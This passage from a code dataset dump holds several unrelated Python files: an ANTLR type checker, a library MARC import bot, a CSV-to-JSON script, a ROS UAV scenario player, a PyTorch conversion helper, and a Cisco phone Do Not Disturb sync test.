[{0}]\\n'\nERROR_FINAL_VALUE_FOR = 'For-loop must have final value int-type, got [{0}]\\n'\nERROR_OPERATOR_MISMATCHED = \"Type [{0}] and type [{1}] couldn't operate with [{2}]\\n\"\nERROR_NOT_OPERATOR_POSTFIX = '[!] 
operator requires boolean variable, got [{0}]\\n'\nERROR_SUB_OPERATOR_POSTFIX = '[-] operator requires int variable, got [{0}]\\n'\nINT_TYPE = 'int'\nBOOL_TYPE = 'boolean'\nARRAY_TYPE = 'array[{0}]'\n\nVOID = 'void'\n\ndef checkTypeCompatible(op, dataType):\n if op.strip() == '=':\n return True\n\n if op.strip() in ['+=', '-=', '+', '-', '*', '/', '%', '<','>', '<=', '>=']:\n return dataType == INT_TYPE\n\n return dataType == BOOL_TYPE\n\ndef getTypeFromOperator(op):\n if op.strip() in ['+', '-', '*', '/', '%']:\n return INT_TYPE\n return BOOL_TYPE\n\ndef checkValidOperation(op, x, y):\n if op.strip() in ['!=', '==']:\n return x == y\n\n if op.strip() in ['+', '-', '*', '/', '%', '<', '>', '<=', '>=']:\n return (x == INT_TYPE) and (y == INT_TYPE)\n\n return (x == BOOL_TYPE) and (y == BOOL_TYPE)\n\nclass MyVisitor(SimpleCodeVisitor):\n def __init__(self, lexer, fWrite):\n self.table = {}\n self.funcTable = {}\n self.arrayTable = {}\n self.lexer = lexer\n self.fWrite = fWrite\n\n def printError(self, ctx, errorMsg, *args):\n if ctx is not None:\n self.fWrite.write('Error at line {0}, column {1} : {2}'.format(ctx.start.line, ctx.start.column, errorMsg.format(*args)))\n else:\n self.fWrite.write('Error at line 0, column 0 : {0}'.format(errorMsg.format(*args)))\n\n def visitField_decl(self, ctx:SimpleCodeParser.Field_declContext):\n dataType = ctx.DATA_TYPE().getText()\n for i in range(ctx.getChildCount()):\n child = ctx.getChild(i)\n if (not isinstance(child, TerminalNodeImpl)) and (child.getText().strip() != ''):\n id = self.visit(child).getText()\n if id in self.table:\n self.printError(ctx, ERROR_DUPLICATE_VAR_DEFINE, id, self.table[id])\n else:\n self.table[id] = dataType\n\n\n def visitMethod_decl(self, ctx:SimpleCodeParser.Method_declContext):\n declarationType = ctx.method_decl_type().getText()\n methodName = ctx.IDENTIFIER().getText()\n if (ctx.method_params()):\n self.funcTable[methodName] = self.visit(ctx.method_params())\n else:\n self.funcTable[methodName] = []\n\n if methodName in self.table:\n if self.table[methodName] != declarationType:\n self.printError(ctx, ERROR_DUPLICATE_VAR_DEFINE, methodName, self.table[methodName])\n else:\n self.table[methodName] = declarationType\n \n listReturned = self.visit(ctx.block())\n\n for child in listReturned:\n returnType = VOID\n if len(child.expr()) > 0:\n returnType = self.visit(child.expr()[0])\n if returnType != declarationType:\n if declarationType == VOID:\n self.printError(child, ERROR_VOID_RETURN_DATA_TYPE, methodName, returnType)\n elif returnType == VOID:\n self.printError(child, ERROR_FUNCTION_RETURN_EMPTY, methodName, declarationType)\n else:\n self.printError(child, ERROR_FUNCTION_RETURN_WRONG_TYPE, methodName, declarationType, returnType)\n\n\n def visitMethod_params(self, ctx:SimpleCodeParser.Method_paramsContext):\n listParams = [id.getText() for id in ctx.DATA_TYPE()]\n # print(ctx.DATA_TYPE())\n return listParams\n\n def visitVariable(self, ctx:SimpleCodeParser.VariableContext):\n if ctx.IDENTIFIER() is not None:\n return ctx.IDENTIFIER()\n return self.visitChildren(ctx)\n \n def visitArray_decl(self, ctx:SimpleCodeParser.Array_declContext):\n if isinstance(ctx.INTLITERAL(), ErrorNodeImpl):\n self.printError(ctx, ERROR_ARRAY_LENGTH_NOT_DEFINED, ctx.IDENTIFIER().getText())\n elif ctx.INTLITERAL().getText() == '0':\n self.printError(ctx, ERROR_ARRAY_ZERO_LENGTH, ctx.IDENTIFIER().getText())\n else:\n # Everything ok\n self.arrayTable[ctx.IDENTIFIER().getText()] = int(ctx.INTLITERAL().getText())\n return ctx.IDENTIFIER()\n\n 
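# Worked examples of the type rules encoded by checkTypeCompatible and\n    # checkValidOperation above (a sketch only, following the code as written):\n    #   checkTypeCompatible('+=', 'int')            -> True   (arithmetic needs int)\n    #   checkTypeCompatible('+=', 'boolean')        -> False\n    #   checkValidOperation('==', 'int', 'int')     -> True   (equality needs same type)\n    #   checkValidOperation('<', 'int', 'boolean')  -> False\n    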
def visitAssign_statement(self, ctx:SimpleCodeParser.Assign_statementContext):\n lhs = self.visit(ctx.location())\n op = ctx.assign_op().getText()\n rhs = self.visit(ctx.expr())\n \n if not self.table.get(lhs):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, lhs)\n return\n \n if not checkTypeCompatible(op, self.table[lhs]):\n self.printError(ctx, ERROR_DATA_TYPE_NOT_COMPATIBLE_OPERATOR, self.table[lhs], op)\n return\n\n if (rhs in [INT_TYPE, BOOL_TYPE]) and (not checkTypeCompatible(op, rhs)):\n self.printError(ctx, ERROR_DATA_TYPE_NOT_COMPATIBLE_OPERATOR, rhs, op)\n return\n\n lhsType = self.table.get(lhs)\n rhsType = rhs\n\n if rhsType not in [INT_TYPE, BOOL_TYPE]:\n rhsType = self.table.get(rhs)\n\n if not rhsType:\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, rhs)\n return\n \n if lhsType != rhsType:\n self.printError(ctx, ERROR_DATA_TYPE_DIFFERENT, lhsType, rhsType)\n \n rhsArrayCheck = self.arrayTable.get(rhs)\n if rhsArrayCheck:\n arrayType = ARRAY_TYPE.format(self.table[rhs])\n self.printError(ctx, ERROR_RHS_IS_ARRAY, arrayType) \n \n def visitLiteral(self, ctx:SimpleCodeParser.LiteralContext):\n if (ctx.INTLITERAL()):\n return INT_TYPE\n if (ctx.BOOLEANLITERAL()):\n return BOOL_TYPE\n return self.visitChildren(ctx)\n\n def visitLocation(self, ctx:SimpleCodeParser.LocationContext):\n varName = ctx.IDENTIFIER().getText()\n # Check if Array\n if ctx.expr():\n arrSize = self.arrayTable.get(varName)\n\n if not arrSize:\n # Not array!\n self.printError(ctx, ERROR_VAR_IS_NOT_ARRAY, varName)\n return varName\n\n idxType = self.visit(ctx.expr())\n\n if idxType not in [INT_TYPE, BOOL_TYPE, None]:\n idxType = self.table.get(idxType)\n \n \n if not idxType:\n self.printError(ctx, ERROR_ARRAY_INDEX_UNDEFINED, varName)\n elif idxType != INT_TYPE:\n self.printError(ctx, ERROR_ARRAY_INDEX_TYPE, varName, idxType)\n else:\n idx = int(ctx.expr().getText())\n if idx >= arrSize or idx < 0:\n self.printError(ctx, ERROR_ARRAY_INDEX_OUT_OF_RANGE, varName, arrSize, idx)\n return varName\n\n def visitMethod_call(self, ctx:SimpleCodeParser.Method_callContext):\n if ctx.CALLOUT() is None:\n funcName = ctx.method_name().getText()\n if not self.table.get(funcName):\n self.printError(ctx, FUNCTION_NOT_DEFINED, funcName)\n return None\n if not self.funcTable.get(funcName):\n self.printError(ctx, ERROR_VAR_EXCUTE_AS_FUNCTION, funcName)\n return None\n\n listParams = []\n if ctx.method_call_params():\n listParams = self.visit(ctx.method_call_params())\n \n if listParams is not None:\n requiredParams = self.funcTable[funcName]\n if requiredParams != listParams: \n self.printError(ctx, FUNCTION_PARAMS_MISMATCHED, funcName, requiredParams, listParams) \n \n return self.table.get(funcName)\n\n self.visitChildren(ctx)\n\n def visitExpr(self, ctx:SimpleCodeParser.ExprContext):\n if (ctx.location()):\n return self.visit(ctx.location())\n if (ctx.literal()):\n return self.visit(ctx.literal())\n if (ctx.method_call()):\n return self.visit(ctx.method_call())\n if (ctx.BINARY_OP()):\n x = self.visit(ctx.expr()[0])\n y = self.visit(ctx.expr()[1])\n if x not in [INT_TYPE, BOOL_TYPE]:\n if not self.table.get(x):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, x)\n else:\n if self.arrayTable.get(x):\n x = ARRAY_TYPE.format(self.table[x])\n else:\n x = self.table[x]\n\n if y not in [INT_TYPE, BOOL_TYPE]:\n if not self.table.get(y):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, y)\n else:\n if self.arrayTable.get(y):\n y = ARRAY_TYPE.format(self.table[y])\n else:\n y = self.table[y]\n \n op = ctx.BINARY_OP().getText()\n opType = 
getTypeFromOperator(op)\n\n if not checkValidOperation(op, x, y):\n self.printError(ctx, ERROR_OPERATOR_MISMATCHED, x, y, op)\n \n return opType\n \n prefix = ctx.getChild(0).getText()\n\n if prefix == '!':\n id = ctx.expr()[0].getText().strip()\n if id == '':\n self.printError(ctx, ERROR_NOT_OPERATOR_POSTFIX, None)\n else:\n id = self.visit(ctx.expr()[0])\n idType = id\n if id not in [BOOL_TYPE, INT_TYPE]:\n if not self.table.get(id):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, id)\n return BOOL_TYPE\n idType = self.table[id] \n if idType != BOOL_TYPE:\n if (id == INT_TYPE) or (idType == INT_TYPE):\n self.printError(ctx, ERROR_NOT_OPERATOR_POSTFIX, INT_TYPE)\n return BOOL_TYPE\n if self.arrayTable.get(id):\n idType = ARRAY_TYPE.format(idType)\n self.printError(ctx, ERROR_NOT_OPERATOR_POSTFIX, idType)\n return BOOL_TYPE\n return BOOL_TYPE\n \n \n if prefix == '-':\n id = ctx.expr()[0].getText().strip()\n if id == '':\n self.printError(ctx, ERROR_SUB_OPERATOR_POSTFIX, None)\n else:\n id = self.visit(ctx.expr()[0])\n idType = id\n if id not in [BOOL_TYPE, INT_TYPE]:\n if not self.table.get(id):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, id)\n return INT_TYPE\n idType = self.table[id] \n if idType != INT_TYPE:\n if (id == BOOL_TYPE) or (idType == BOOL_TYPE):\n self.printError(ctx, ERROR_SUB_OPERATOR_POSTFIX, BOOL_TYPE)\n return INT_TYPE\n if self.arrayTable.get(id):\n idType = ARRAY_TYPE.format(idType)\n self.printError(ctx, ERROR_SUB_OPERATOR_POSTFIX, idType)\n return INT_TYPE\n return self.visitChildren(ctx)\n\n def visitMethod_call_params(self, ctx:SimpleCodeParser.Method_call_paramsContext):\n listParams = []\n for _ in ctx.expr():\n id = self.visitExpr(_)\n\n if id in [INT_TYPE, BOOL_TYPE]:\n listParams.append(id)\n continue\n\n if not self.table.get(id):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, id)\n return None\n listParams.append(self.table[id])\n\n return listParams\n\n def visitBlock(self, ctx:SimpleCodeParser.BlockContext):\n self.visitChildren(ctx)\n listReturned = []\n for _ in ctx.statement():\n if _.RETURN() is not None:\n listReturned.append(_)\n return listReturned\n \n def visitStatement(self, ctx:SimpleCodeParser.StatementContext):\n if (ctx.IF()):\n idx = self.visit(ctx.expr()[0])\n if idx not in [INT_TYPE, BOOL_TYPE, None]:\n idx = self.table.get(idx)\n if idx != BOOL_TYPE:\n self.printError(ctx, ERROR_IF_CONDITION_MUST_BE_BOOLEAN, idx)\n \n if (ctx.FOR()):\n idx = ctx.IDENTIFIER()\n\n if idx is None:\n self.printError(ctx, ERROR_MISSING_IDENTIFIER_FOR)\n return self.visitChildren(ctx)\n \n idx = idx.getText()\n idxType = self.table.get(idx)\n if idxType not in [INT_TYPE, None]:\n self.printError(ctx, ERROR_ITERATOR_LOOP_NOT_INT, idxType)\n else:\n isArray = self.arrayTable.get(idx)\n if isArray:\n self.printError(ctx, ERROR_ITERATOR_LOOP_NOT_INT, ARRAY_TYPE.format(idxType))\n \n listForParams = ctx.expr()\n if len(listForParams) != 2:\n self.printError(ctx, ERROR_PARAMS_FOR, len(listForParams) + 1)\n return self.visitChildren(ctx)\n \n initValueType = self.visit(listForParams[0])\n if initValueType != INT_TYPE:\n self.printError(ctx, ERROR_INIT_VALUE_FOR, initValueType)\n \n finalValueType = self.visit(listForParams[1])\n if finalValueType != INT_TYPE:\n self.printError(ctx, ERROR_FINAL_VALUE_FOR, finalValueType)\n \n\n return self.visitChildren(ctx)\n\ndef main(argv):\n input_stream = FileStream(argv[1])\n lexer = SimpleCodeLexer(input_stream)\n stream = CommonTokenStream(lexer)\n parser = SimpleCodeParser(stream)\n parser._listeners = [MyErrorListener()]\n 
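# Note: assigning parser._listeners directly pokes a private attribute; the\n    # documented antlr4 route is parser.removeErrorListeners() followed by\n    # parser.addErrorListener(MyErrorListener()).\n    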
tree = parser.program()\n    visitor = MyVisitor(lexer, fWrite)\n    visitor.visit(tree)\n    # Check for main method\n    if not visitor.table.get('main'):\n        visitor.printError(None, MAIN_METHOD_IS_NOT_AVAILABLE)\n    # flattenTree(tree, lexer)\n    print(visitor.table)\n    print(visitor.funcTable)\n    print(visitor.arrayTable)\nif __name__ == '__main__':\n    main(sys.argv)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":19994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"112265386","text":"\"\"\"\n eccobots.py - MARC Bots for ECCO MARC files\n\"\"\"\n__author__ = 'Jeremy Nelson'\n\nfrom marcbots import MARCImportBot\nfrom pymarc import Field\n\nPROXY_LOCATION = '0-galenet.galegroup.com.tiger.coloradocollege.edu'\n\nclass ECCOBot(MARCImportBot):\n    ''' Class reads Eighteenth Century Collections Online (ECCO) MARC file,\n    validates and adds/modifies fields, and generates a MARC file for\n    importing into TIGER.'''\n\n    def __init__(self,\n                 marc_file):\n        ''' \n        Creates instance of bot for creating valid MARC record for\n        importing into TIGER from ECCO MARC file.\n\n        :param marc_file: file location for ECCO MARC file\n        '''\n        self.series_statement = 'Eighteenth century collections online'\n        MARCImportBot.__init__(self,marc_file)\n\n    def processRecord(self,marc_record):\n        '''\n        Call-back method for specific Gale ECCO validation and\n        processing.\n        \n        :param marc_record: MARC record, required\n        '''\n        marc_record = self.validate001(marc_record)\n        marc_record = self.validate490(marc_record)\n        marc_record = self.validate830(marc_record)\n        marc_record = self.processURLs(marc_record,\n                                       proxy_location=PROXY_LOCATION)\n        return marc_record\n\n    def validate001(self,marc_record):\n        ''' Method sets 001 Control Number to CC's format.\n\n        :param marc_record: MARC record, required\n        '''\n        field001 = marc_record.get_fields('001')[0]\n        marc_record.remove_field(field001)\n        raw_data = field001.data\n        field001.data = 'ESTC%s' % raw_data\n        marc_record.add_field(field001)\n        return marc_record\n\n    def validate490(self,marc_record):\n        \"\"\"\n        Method adds/sets 490 field with series statement.\n\n        :param marc_record: MARC record, required\n        \"\"\"\n        all490s = marc_record.get_fields('490')\n        if len(all490s) > 0:\n            for field in all490s:\n                marc_record.remove_field(field)\n                if field.get_subfields('a')[0] != self.series_statement:\n                    field.delete_subfield('a')\n                    field.add_subfield('a',self.series_statement)\n                field.indicators = ['1','\\\\']\n                marc_record.add_field(field)\n        else:\n            field490 = Field(tag='490',\n                             indicators=['1','\\\\'],\n                             subfields=['a',self.series_statement])\n            marc_record.add_field(field490)\n        return marc_record\n\n    def validate830(self,marc_record):\n        \"\"\"\n        Method adds/sets 830 field with series statement.\n\n        Parameters:\n        - `marc_record`: MARC record \n        \"\"\"\n        all830s = marc_record.get_fields('830')\n        if len(all830s) > 0:\n            for field830 in all830s:\n                marc_record.remove_field(field830)\n                if field830.get_subfields('a')[0] != self.series_statement:\n                    field830.delete_subfield('a')\n                    field830.add_subfield('a',self.series_statement)\n                field830.indicators = ['\\\\','0']\n                marc_record.add_field(field830)\n        else:\n            field830 = Field(tag='830',\n                             indicators=['\\\\','0'],\n                             subfields=['a',self.series_statement])\n            marc_record.add_field(field830)\n        return 
marc_record\n","sub_path":"aristotle/apps/marc/bots/eccobots.py","file_name":"eccobots.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"121292828","text":"import json \nclublist =[]\nwith open(\"csvdata.txt\",\"r\") as inp:\n for f in inp.readlines():\n team,city,country = f.strip().split(',')\n data = {\n \"team\" : team,\n \"city\" : city,\n \"country\" : country\n }\n print(f\"{team} -> {city} -> {country}\")\n clublist.append(data)\n\nwith open(\"writecsvtojson.txt\",\"w\") as op:\n json.dump(clublist,op)\n \n","sub_path":"convertcsvtojson.py","file_name":"convertcsvtojson.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"538763447","text":"#!/usr/bin/python\n\nimport os\nfrom collections import OrderedDict\nimport json\n\nimport rospy\nimport rospkg\nfrom geometry_msgs.msg import Vector3Stamped\nfrom visualization_msgs.msg import Marker, MarkerArray\n\nfrom last_letter_msgs.msg import Parameter\nimport uav_ftc.fault_generator as fg\n\nclass Scheduler:\n\n scenario = None\n pending_item = None\n reference = None\n wp_list = None\n wp_count = 0\n timestamp = None\n end_reached = False\n start_time = None\n relative_time = False\n\n def __init__(self, scenario_file):\n self.start_time = rospy.Time.now() # Store initialization instance\n self.ref_rates_pub = rospy.Publisher('refRates', Vector3Stamped, queue_size=10) # Setup rates reference publisher\n self.ref_traj_pub = rospy.Publisher('refTrajectory', Vector3Stamped, queue_size=10) # Setup trajectory reference publisher\n self.ref_wp_pub = rospy.Publisher('waypoints', MarkerArray, queue_size=10) # Setup waypoint reference publisher\n # Setup fault publisher\n self.fg = fg.FaultGenerator()\n self.fault_pub = rospy.Publisher('parameter_changes', Parameter, queue_size=100)\n\n with open(scenario_file) as fh:\n try:\n json_dict = json.load(fh, object_pairs_hook=OrderedDict)\n except ValueError as e:\n rospy.logerr('Malformed json scenario file')\n\n self.reference = Vector3Stamped()\n self.wp_list = MarkerArray()\n\n self.scenario = json_dict\n # Read if there is a relative_time specification\n self.relative_time = self.scenario.pop('relative_time', False)\n if self.relative_time:\n rospy.loginfo('Mission specified relative timing')\n\n try:\n self.popitem()\n except StopIteration:\n self.end_reached = True\n\n def check_time(self):\n now = rospy.Time.now()\n if self.relative_time:\n time = now - self.start_time\n else:\n time = now\n # print('Time: {}'.format(time.secs))\n\n if self.pending_item['time'] <= time.secs:\n self.parse_next_point()\n\n def parse_next_point(self):\n # Apply the reference\n try:\n self.parse_point(self.pending_item)\n except AttributeError as e:\n print(e)\n # Pop the next item\n try:\n self.popitem()\n except StopIteration:\n self.end_reached = True\n\n def parse_point(self, ref_item):\n for attribute, value in ref_item.iteritems():\n if attribute == 'time':\n # set the timestamp\n self.timestamp = rospy.Time.now()\n continue\n\n if attribute == 'angular_rates':\n # Read and publish a new reference rates tuple\n rospy.loginfo('Publishing new reference rates')\n for ref_type, ref_value in value.iteritems():\n if ref_type == 'p':\n v_attr_name = 'x'\n elif ref_type == 'q':\n v_attr_name = 'y'\n elif ref_type == 'r':\n v_attr_name = 'z'\n else:\n raise AttributeError('Invalid reference attribute {}'.format(ref_type))\n 
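# the p/q/r rate references are packed into the Vector3Stamped's x/y/z fields\n                    # before the message is stamped and published below\n                    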
setattr(self.reference.vector, v_attr_name, ref_value)\n rospy.loginfo(\"New reference:\\n {}\".format(self.reference))\n self.reference.header.stamp = self.timestamp\n self.ref_rates_pub.publish(self.reference)\n\n if attribute == 'trajectory':\n # Read and publish a new reference trajectory\n rospy.loginfo('Publishing new reference trajectory')\n for ref_type, ref_value in value.iteritems():\n if ref_type == 'airspeed':\n v_attr_name = 'x'\n elif ref_type == 'gamma':\n v_attr_name = 'y'\n elif ref_type == 'psi_dot':\n v_attr_name = 'z'\n else:\n raise AttributeError('Invalid reference attribute {}'.format(ref_type))\n setattr(self.reference.vector, v_attr_name, ref_value)\n rospy.loginfo(\"New reference:\\n {}\".format(self.reference))\n self.reference.header.stamp = self.timestamp\n self.ref_traj_pub.publish(self.reference)\n\n if attribute == 'waypoint':\n # Read and a new reference waypoint\n rospy.loginfo('Reading new reference waypoint')\n flush = False\n\n new_wp = Marker()\n new_wp.header.stamp = self.timestamp\n new_wp.header.frame_id = 'map'\n new_wp.action = new_wp.ADD\n new_wp.type = new_wp.SPHERE\n new_wp.id = self.wp_count\n new_wp.pose.orientation.x = 0\n new_wp.pose.orientation.y = 0\n new_wp.pose.orientation.z = 0\n new_wp.pose.orientation.w = 1\n new_wp.color.r = 0\n new_wp.color.g = 1\n new_wp.color.b = 0\n new_wp.color.a = 1\n\n self.wp_count += 1\n for ref_type, ref_value in value.iteritems():\n if ref_type == 'n':\n new_wp.pose.position.x = ref_value\n elif ref_type == 'e':\n new_wp.pose.position.y = ref_value\n elif ref_type == 'd':\n new_wp.pose.position.z = ref_value\n elif ref_type == 'r':\n new_wp.scale.x = 2*ref_value\n new_wp.scale.y = 2*ref_value\n new_wp.scale.z = 2*ref_value\n elif ref_type == 'flush':\n flush = ref_value\n else:\n raise AttributeError('Invalid reference attribute {}'.format(ref_type))\n rospy.loginfo(\"New waypoint reference:\\n {}\".format(new_wp))\n self.wp_list.markers.append(new_wp)\n if flush:\n self.ref_wp_pub.publish(self.wp_list)\n\n if attribute == 'fault':\n # Signal a new fault from a predetermined set of faults\n rospy.loginfo('Publishing new fault')\n message_list = self.fg.generate_fault(value)\n for msg in message_list:\n msg.header.stamp = self.timestamp\n self.fault_pub.publish(msg)\n\n \n def popitem(self):\n while True:\n try:\n # print(self.scenario)\n _, self.pending_item = self.scenario.popitem(last=False)\n # print(self.pending_item)\n if 'time' not in self.pending_item.keys():\n rospy.logwarn('Scenario item did not specify time attribute. 
Popping the next one')\n raise AttributeError\n break\n except AttributeError:\n continue\n except KeyError: # OrderedDict has been exhausted\n raise StopIteration\n # else:\n # break\n\n\nif __name__ == '__main__':\n rospy.init_node('scenario_player', anonymous=True)\n rospy.loginfo('Scenario player node up')\n r = rospy.Rate(10)\n\n scenario_file = rospy.get_param('~scenario')\n\n rospack = rospkg.RosPack()\n package_path = rospack.get_path('uav_ftc')\n rospy.loginfo('Package found at {0}'.format(package_path))\n\n if scenario_file != 'none':\n\n rospy.loginfo('Playing scenario {0}'.format(scenario_file))\n full_filename = os.path.join(package_path, 'data/scenarios', scenario_file+'.json')\n rospy.loginfo('Full file name: {0}'.format(full_filename))\n\n scheduler = Scheduler(full_filename)\n\n while not rospy.is_shutdown() and not scheduler.end_reached:\n scheduler.check_time()\n r.sleep()\n\n rospy.loginfo(\"Scenario ended.\")","sub_path":"scripts/scenario_player.py","file_name":"scenario_player.py","file_ext":"py","file_size_in_byte":8106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"393946040","text":"import torch\nfrom torch.autograd import Variable\nfrom scipy.sparse.csr import csr_matrix\nfrom collections import Iterable\n\n\nclass Convert():\n def __init__(self):\n pass\n\n @staticmethod\n def to(a, cuda=False):\n if isinstance(a, Variable):\n ret = a.double()\n elif not isinstance(a, Iterable):\n ret = Variable(torch.tensor(int(a)))\n elif isinstance(a, csr_matrix):\n ret = Variable(torch.from_numpy(a.toarray()).float())\n else:\n ret = Variable(torch.tensor(a).float())\n if cuda:\n ret = ret.cuda()\n return ret\n\n# X = X.float()\n# or cast your complete model to DoubleTensor as\n#\n# model = model.double()\n# You can also set the default type for all tensors using\n#\n# pytorch.set_default_tensor_type('torch.DoubleTensor')","sub_path":"src/library/vision/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"587149767","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##########################################################################\n# Script Header\n#\n# $Id: US25538\n#\n# Copyright (c) 2014 Cisco Systems, Inc.\n#\n# Name:\n# cmCC245538_3pcc_BS_IOT_Interop_149_ActivateDNDFromPrimaryPhone.py\n#\n# Purpose:\n# This test case verifies that the DUT is able to synchronize a Do Not\n# Disturb status change from the primary DUT phone to BroadWorks.\n#\n#\n# Description:\n# it include 1 case\n# 1: From the primary phone activate DND, check the value on the server\n# and on the alternate phone\n#\n# Test bed requirement:\n# 1: Two 3pcc Phone\n# 2: Two phones should register successfully before running script\n# 3: Feature Key sync should be enabled in both the phones\n#\n# Test Steps:\n# 1. From the primary DUT phone activate the DND\n# Verify:\n# 1. Primary phone visual status indicates that Do Not Disturb is “ON\".\n# 2. Alternate phone visual status indicates that Do Not Disturb is “ON”.\n# 3. BroadWorks Do Not Disturb service for the DUT is “ON”. Browse to\n# BroadWorks User → Incoming Calls → Do Not Disturb to confirm.\n# Verify the SIP signaling to and from the DUT.\n# 1. DUT sends a SUBSCRIBE with the Do Not Disturb setting\n# requested as “true”.\n# 2. BroadWorks responds with a 200 OK.\n# 3. 
BroadWorks sends a NOTIFY to the primary and alternate DUT phones\n# with the Do Not Disturb setting confirmed as “true”.\n# 4. Each DUT responds with a 200 OK.\n#\n# Known Bugs:\n#\n# End of Header\n###############################################################################\nimport tng\nimport logging\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nfrom tng.frontend.timing import wait\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\n\nlog = logging.getLogger('ActivateDNDFromPrimaryPhone')\n\n\nclass ActivateDNDFromPrimaryPhone(SetupHelpersTestCase, tng.api.TestCase):\n helpers = (\n PhoneConfigHelper, PhoneLineRegHelper, BroadsoftLoginHelper,\n TsharkHelper)\n helper_num_devices = 2\n\n def setUp(self):\n log.info(\"Start of setUp\")\n\n self.proxy = self.phone_data['proxy']\n self.shared_userID = self.user_id1 + 'b'\n self.device_type = 'Cisco-Hybrid' + self.oPhone1.get_web_status(\n 'Product_Name')[2:]\n self.serverproxy = self.bsoft_data['as_ip_addr']\n self.xsi_user_id1 = self.bsoft_data['xsi_user_id1']\n\n # Configure Shared line on Phone1\n self.broadsoft = BroadsoftConfig()\n self.shared_name = self.bsoft_web.configure_shared_line(\n shared_number=self.shared_userID, device_type=self.device_type,\n user_phone_num=self.user_id1)\n\n def broadsoft_delete_shared_line():\n self.bsoft_web.delete_shared_line(\n user_phone_num=self.user_id1, shared_name=self.shared_name)\n self.addCleanup(broadsoft_delete_shared_line)\n\n self.dnd_status_intial = self.broadsoft.get_dnd_status(\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n log.info('Initial DND status is {}'.format(self.dnd_status_intial))\n if self.dnd_status_intial == \"true\":\n self.broadsoft.set_dnd(\n active='false', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n\n def broadsoft_clear_dnd():\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=False, dfks_update=True)\n self.broadsoft.set_dnd(\n active='false', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.addCleanup(broadsoft_clear_dnd)\n\n log.info(\"End of setUp\")\n\n def test_activate_dnd_primaryphone(self):\n\n log.info(\"Start of test_activate_dnd_primaryphone\")\n\n log.info(\"Configure shared line on Phone1 and Phone2\")\n self.oPhone1.set_shared_extension()\n self.oPhone2.set_shared_extension()\n self.oPhone2.set_shared_line(self.shared_userID)\n log.info(\"Enable Feature Key sync in Phone1\")\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=True, dfks_update=False)\n log.info(\"Enable Feature Key sync in Phone2\")\n self.oPhone2.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=True, dfks_update=False)\n # check the dnd status on Phone1 and in Phone 2\n self.product_model = self.oPhone1.get_web_status('Product_Name')\n wait(5, 'wait for 5 seconds before checking for softkey')\n if '7832' not in self.product_model:\n self.verify_dnd_on_phone(self.oPhone1, 'SK_DND')\n self.verify_dnd_on_phone(self.oPhone2, 'SK_DND')\n log.info('Start tshark on 
linux')\n dut1_ip = self.oPhone1.ip\n dut2_ip = self.oPhone2.ip\n filter_cmd = 'port sip and (host {} or host {})'.format(\n dut1_ip, dut2_ip)\n capture_file = self.tshark.tshark_start(filter_cmd)\n # Enable DND on phone 1\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 1, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=False, dfks_update=True)\n wait(5, 'wait for 5 seconds before checking for softkey')\n if '7832' not in self.product_model:\n self.verify_dnd_on_phone(self.oPhone1, 'SK_NDND')\n self.verify_dnd_on_phone(self.oPhone2, 'SK_NDND')\n # verify DND Setting is enabled in server\n verify_dnd = self.broadsoft.get_dnd_status(\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n self.assertEqual(verify_dnd, \"true\")\n log.info(\"stop tshark run\")\n self.tshark.tshark_stop()\n # tshark analaysis\n cseq, callid = self.tshark.tshark_get_method_cseq_call_id(\n capture_file, dut1_ip, self.serverproxy, 'Request: SUBSCRIBE')\n log.info(\"Check if Do Not Disturb setting is requested as 'true'\")\n self.tshark.tshark_check_string_in_packet_bytes(\n capture_file, src_ip=dut1_ip, dst_ip=self.serverproxy, cseq=cseq,\n call_id=callid,\n search_string=(\n 'true'),\n protocol='sip', exist=True, method='SUBSCRIBE',\n return_header=False)\n\n log.info(\"Check if 200OK is send from Server to Phone1\")\n self.tshark.tshark_verify_message_and_response_with_200OK(\n capture_file, 'Request: SUBSCRIBE', dut1_ip, self.serverproxy,\n callid)\n\n log.info(\n \"Getting CSeq and CallID for NOTIFY of \"\n \"primary phone from server\")\n cseq1, callid1 = self.tshark.tshark_get_method_cseq_call_id(\n capture_file, self.serverproxy, dut1_ip, 'Request: NOTIFY')\n log.info(\"Check if Do Not Disturb setting is requested as 'true'\")\n self.tshark.tshark_check_string_in_packet_bytes(\n capture_file, 